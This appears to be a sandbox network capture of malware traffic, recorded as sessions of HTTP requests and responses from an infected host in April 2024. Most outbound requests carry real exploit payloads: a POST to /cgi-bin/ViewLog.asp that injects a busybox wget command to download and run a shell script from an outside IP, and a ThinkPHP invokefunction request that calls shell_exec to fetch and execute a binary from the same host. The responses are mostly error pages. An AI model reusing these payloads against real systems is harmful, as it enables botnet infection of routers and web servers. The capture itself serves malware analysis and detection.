                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. *//* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, s


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        454192.168.2.233338085.92.112.88080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.624932051 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:09.923120022 CEST295INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        455192.168.2.233452295.217.235.928080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.663427114 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.661293030 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:10.987612009 CEST113INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        456192.168.2.235637694.120.164.1938080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.663491964 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        457192.168.2.235749231.200.2.2108080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.663541079 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        458192.168.2.235675294.191.61.908080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.668687105 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:36:11.372353077 CEST1246INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 1097
                                                        Date: Sun, 14 Apr 2024 14:36:11 GMT
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 68 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 62 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 70 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 61 2e 6e 61 6d 65 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 44 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 34 37 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!doctype html><html lang="en"><head><title>HTTP Status 404 Not Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 Not Found</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Description</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.47</h3></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        459192.168.2.233278894.122.14.2558080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.670563936 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        460192.168.2.234763695.100.183.3380
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.845716953 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.125227928 CEST581INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 359
                                                        Expires: Sun, 14 Apr 2024 14:36:09 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:09 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 35 32 38 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 39 26 23 34 36 3b 37 39 32 63 61 36 64 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 35 32 38 66 37 34 38 26 23 34 36 3b 31 37 31 33 31 30 35 33 36 39 26 23 34 36 3b 37 39 32 63 61 36 64 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;4528f748&#46;1713105369&#46;792ca6d<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;4528f748&#46;1713105369&#46;792ca6d</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        461192.168.2.234414295.171.29.1480
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.891201019 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.218945980 CEST466INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        462192.168.2.234424095.100.119.16880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.899528980 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.235312939 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 34 38 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 30 26 23 34 36 3b 34 64 35 36 62 36 34 35 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 34 38 37 35 37 62 35 63 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 30 26 23 34 36 3b 34 64 35 36 62 36 34 35 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;48757b5c&#46;1713105370&#46;4d56b645<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;48757b5c&#46;1713105370&#46;4d56b645</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        463192.168.2.234394695.78.236.22880
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:09.902957916 CEST321OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.242053986 CEST392INHTTP/1.1 400 Bad Request
                                                        Date: Sun, 14 Apr 2024 14:36:07 GMT
                                                        Server: Apache
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        464192.168.2.235430288.221.62.15980
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.190937042 CEST333OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://194.62.248.103/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Apr 14, 2024 16:36:10.490422010 CEST583INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 361
                                                        Expires: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Date: Sun, 14 Apr 2024 14:36:10 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 38 32 35 65 36 63 63 31 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 30 26 23 34 36 3b 34 34 32 63 31 32 62 61 0a 3c 50 3e 68 74 74 70 73 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 65 72 72 6f 72 73 26 23 34 36 3b 65 64 67 65 73 75 69 74 65 26 23 34 36 3b 6e 65 74 26 23 34 37 3b 39 26 23 34 36 3b 38 32 35 65 36 63 63 31 26 23 34 36 3b 31 37 31 33 31 30 35 33 37 30 26 23 34 36 3b 34 34 32 63 31 32 62 61 3c 2f 50 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;825e6cc1&#46;1713105370&#46;442c12ba<P>https&#58;&#47;&#47;errors&#46;edgesuite&#46;net&#47;9&#46;825e6cc1&#46;1713105370&#46;442c12ba</P></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        465192.168.2.234064431.136.143.1738080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:36:10.337865114 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
